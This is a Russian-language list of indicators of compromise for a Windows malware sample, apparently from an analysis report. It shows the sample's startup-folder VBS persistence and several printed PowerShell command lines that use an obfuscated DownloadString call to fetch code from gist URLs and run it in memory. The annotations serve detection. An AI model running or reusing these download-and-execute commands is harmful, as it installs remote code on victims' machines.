Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\shvhost42.vbs (папка автозагрузки пользователя: скрипт из неё запускается при каждом входе в систему)
- %LOCALAPPDATA%\8tjglg93ghfprogr.exe
- %TEMP%\creativecloud\acc\adobedownload\hdinstaller.log
- %LOCALAPPDATA%\apisolo.vbs
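- 'gi##.###hubusercontent.com':443 (маска соответствует узлу gist.githubusercontent.com из командных строк ниже; это легитимный общий хостинг, поэтому индикатором служит конкретный путь gist, а не домен целиком)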
- DNS ASK gi##.###hubusercontent.com
- '%LOCALAPPDATA%\8tjglg93ghfprogr.exe'
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\apisolo.vbs"
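- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/4242aboabdoamail...' (со скрытым окном). Примечание: массив [char[]](68,111,…,103) — это ASCII-коды строки «DownloadString», то есть вызывается метод DownloadString объекта Net.WebClient, а его результат передаётся в Invoke-Expression: загруженный текст выполняется в памяти без сохранения на диск. Такая же конструкция используется во всех командных строках powershell.exe в этом списке; при включённом PowerShell Script Block Logging выполняемый код попадает в событие 4104.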
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/4343aboabb43amai...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/4242aboabdoamail...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://gist.githubusercontent.com/4343aboabb43amai...